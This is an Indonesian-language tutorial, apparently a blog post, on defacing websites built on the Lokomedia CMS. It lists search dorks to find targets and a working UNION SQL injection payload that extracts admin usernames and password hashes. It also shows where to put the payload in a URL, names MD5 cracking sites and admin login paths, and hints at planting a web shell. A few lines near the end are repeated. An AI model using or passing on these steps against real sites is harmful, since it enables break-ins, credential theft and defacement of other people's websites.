Berbicara soal teknik SQLi CMS Lokomedia ini, pasti sudah kesohor di kalangan defacer/hacker tanah air. Terlebih lagi sekarang ini yg semakin banyak defacer yang mengexploit CMS Lokomedia ini."Tutorial Deface SQLi CMS Lokomedia"
Bahan :
1. Dork :
inurl:statis-1-profil.html
inurl:statis-2-profil.html
inurl:statis-3-strukturorganisasi.html
inurl:statis-2-struktur.html
2. Exploit SQLi (SQL Injection) :
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
cara exploitnya ??dih dikasih tau
contoh :
http://target.co.li/statis-2-profil.html
exploit nya sesudah angka jadi kaya gini :
http://target.co.li/statis-2'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.htmlngerti??
3. MD5 Decrypter :
MD5 Decrypt nya pake otak kamu sendiri aja :v tenang ada tool online nya kokhttps://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/
Tutorial :
1.dork pake dork dia atas2. Cari targetnya
3. Jika Vuln akan ada kode MD5 di bar klo kurang jelas bisa di crtl+u
5. Tinggal cari dimana tempat login admin nya :) biasanya ada di :
http://target.co.li/admin/
http://target.co.li/adminweb/
http://target.co.li/admininistrator/
6. Untuk Nanem shell ?? gunakan pikiran mu :)
http://target.co.li/admin/
http://target.co.li/adminweb/
http://target.co.li/admininistrator/
6. Untuk Nanem shell ?? gunakan pikiran mu :)
ok sekian wassalam
EmoticonEmoticon